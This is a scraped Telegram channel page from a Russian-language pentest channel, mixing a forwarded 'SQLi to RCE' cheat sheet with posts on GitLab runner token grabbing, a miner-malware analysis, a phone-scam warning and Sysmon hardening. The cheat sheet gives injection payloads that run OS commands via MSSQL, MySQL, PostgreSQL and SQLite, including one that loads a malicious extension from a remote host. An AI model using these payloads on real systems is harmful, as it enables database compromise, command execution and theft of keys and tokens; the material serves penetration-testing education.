Похек
16.5K subscribers
2.09K photos
110 videos
243 files
3.06K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from hx0110
SQLi to RCE

На самом деле тема исполнения команд по средствам SQL инъекций сотни раз подвергалась обсуждениям, но думаю стоит собрать это все в одном месте). Техники брались в основном из статейки на medium и поста Intigriti в твитере (советую поглядеть)

Исполниться можно в контекстах разных баз данных:
1. MSSQL 💻
2. MySQL 😗
3. PostgreSQL 💻
4. Oracle 🤪
5. SQLite 🤝 (не нашел emoji :))

MSSQL: наверно самая известная техника среди пентестеров (sqli to rce) - это способ исполнения в MSSQL базах данных с использованием хранимой процедуры xp_cmdshell. Конечно, должны присутствовать необходимые привилегии, чтобы ее включить, так как по дефолту она выключена. После этого можно выполнять команды:

EXEC xp_cmdshell 'dir c:\';


MySQL: в этой субд исполниться можно за счет определяемых пользователем функций (UDF). Правда для этого необходимо загрузить и зарегистрировать библиотеку или она должна быть загружена администратором, после чего можно вызывать функции из этой библиотеки. Например:

SELECT sys_eval('whoami');


PostgreSQL: В постгресе есть несколько возможных подходов.
1 - Возможность подгрузки расширений. Можно использовать расширение по типу plpythonu для исполнения python когда прямо из SQL.
-- create extension
CREATE EXTENSION IF NOT EXISTS plpythonu;

-- define the malicious function
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS void AS $$
import os
os.system(cmd)
$$ LANGUAGE plpythonu;

-- execute command
SELECT exec_cmd('whoami');


2 - Загрузка функции напримую из libc например
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('whoami');


3- Команда PROGRAM

ORACLE: так как oracle имеет встроенный Java движок это позволяет создавать разработчикам хранимые процедуры. Злоумышленники тоже могут этим воспользоваться для создания своей вредоносной процедуры(подробнее см. статью на медиуме)

SQLite: в sqlite можно также пойти через подгрузку расширений, но эта возможность должна быть явна включена:
UNION SELECT 1,load_extension('\\example.com\mal_extension.so', 'MainFuncCall')

или например с помощью load_file() прочитать закрытые ключи SSH (этот подход можно применять и в других бдшках)


Если вдруг чего то не хватает, подмечайте, обязательно добавлю !)

#SQLi #RCE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19👍2
Редтим до того, как его стали так называть
#meme

🌚 @poxek @poxek_meme
Please open Telegram to view this post
VIEW IN TELEGRAM
😁28🔥32👍1
Бывают случаи, когда вы получаете доступ к Gitlab'у в рамках пентест проекта. Но что делать кроме клона доступных репозиториев?

Если у нас есть права в рамках gitlab или репозитория, вы можете зарегистрировать gitlab runner и сделать hijack в репозиторий, куда запулят во время работы скрипта. Дальше вы получите в grabbed_data.json с токенами. Большим плюсом является то, что джоба не падает, что позволяет не привлекать не нужное внимание разработчика или тем более appsec/devsecops. Безуслоно техника не новая, но полезно о ней помнить)

⭐️ Github

💎 Cheatsheet от snovvcrash

⭐️ Ресерч от индуса

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
1👍11🌚21
Расскажите про свои самые странные/кринжовые и веселые/позитивные истории связанные с собеседованиями.

Я начну: у меня есть лучший друг, который готовился на собес в один красный телеком и за пару минут до собеса, этот же телеком перестал работать во всём доме. Лицо друга представляете?)
😁40
BI.ZONE прислал подарки на Новый Год, как комьюнити партнеру :)

Сейчас будет распакоувка
🔥30👍4
Похек
BI.ZONE прислал подарки на Новый Год, как комьюнити партнеру :) Сейчас будет распакоувка
Очень по новогоднему, максимально подняли настроение сегодня. А ещё классная открытка с личными поздравлениями, что очень умилительно)

Большое спасибо команда BIZONE BugBounty <3 ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2414🔥91
Разбор одного вируса с ТГ канала peekbot
#malware

Автор решил написать эту заметку, чтобы помочь потенциальными жертвам подобных раздач вирусов, люди пытаются найти способы смотреть ютуб, а находят майнер в свою ОС. Здесь будут приведены все пруфы которые я смог собрать специально заражая этим вирусом отдельную машину с Windows 10.

На ТГ канале peekbot при поддержке его ютубканала peekbot, с видеоинструкциями по установке и настройке, раздаётся файл с вирусом-майнером, внедренный в известный многим пакет zapret.zip с гитхаба, который меняет формат пакетов tcp/ip чтобы "ускорить" старые "медленные сервера" googlevideo и не только. Заранее просьба ко всем - подайте жалобы на эти TG и Youtube каналы с указанием на вирус-майнер. Жертв вируса будет намного меньше если эти каналы исчезнут, там сейчас очень много незадачливых подписчиков (30к на ТГ и 61К а Ютубе).

➡️ Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | ☕️ Всем новогоднего настроения!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍66
Новогодний опрос про ваш опыт прохождения курсов в этом году 🌚

Опрос анонимный, данные никуда не уйдут 😹

👉 Отвечать ТУТ 👈

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | ☕️ Всем новогоднего настроения!
Please open Telegram to view this post
VIEW IN TELEGRAM
2
Попытались меня сейчас развести якобы от лица моего телефонного оператора

Назвали мои данные: ФИО, номер телефона, СНИЛС, ИНН. Якобы закончился срок действия номера телефона и предложили или продлить, или заменить на другой. Я чёт как лопух во всё поверил, т.к. очень грамотно ссылались на законодательные акты о перс данных, случаях серых симок и т.д.

Последнее, что остановило: СМС от госуслуг, где сука написано: Смена пароля и код для подтверждения, который нужно было назвать боту. Вот тут я уже трубку сбросил.

Будьте бдительны и не видетесь на новую разводку ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍36😁365
Надзор за Sysmon. Защищаем мониторинг от атак штатными средствами Windows
#харденинг #windows #sysmon

На пути ата­кующе­го час­то сто­ят сис­темы EDR, цель которых — обна­ружить ата­ку и сооб­щить о ней пер­вой линии обо­роны SOC. Что­бы оста­вать­ся незаме­чен­ными, пен­тесте­рам при­ходит­ся обхо­дить монито­ринг. В этой статье погово­рим о том, как имен­но это дела­ется в слу­чае с ата­ками на Windows.
Как извес­тно, один из основных механиз­мов Windows, на который полага­ются боль­шинс­тво решений клас­са EDR, — это Event Tracing for Windows. Он как пос­тавля­ет дан­ные для фор­мирова­ния алер­тов, так и дела­ет записи в при­выч­ном нам жур­нале событий (в отдель­ных слу­чаях).

Ра­нее мы уже раз­бирали, как ата­кующие могут воз­дей­ство­вать на под­систе­му ETW, что­бы сде­лать Sysmon мак­сималь­но бес­полез­ным. В этом матери­але мы пос­мотрим, как эти тех­ники мож­но детек­тировать (как ни стран­но, но с помощью того же самого ETW).

🔓 Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6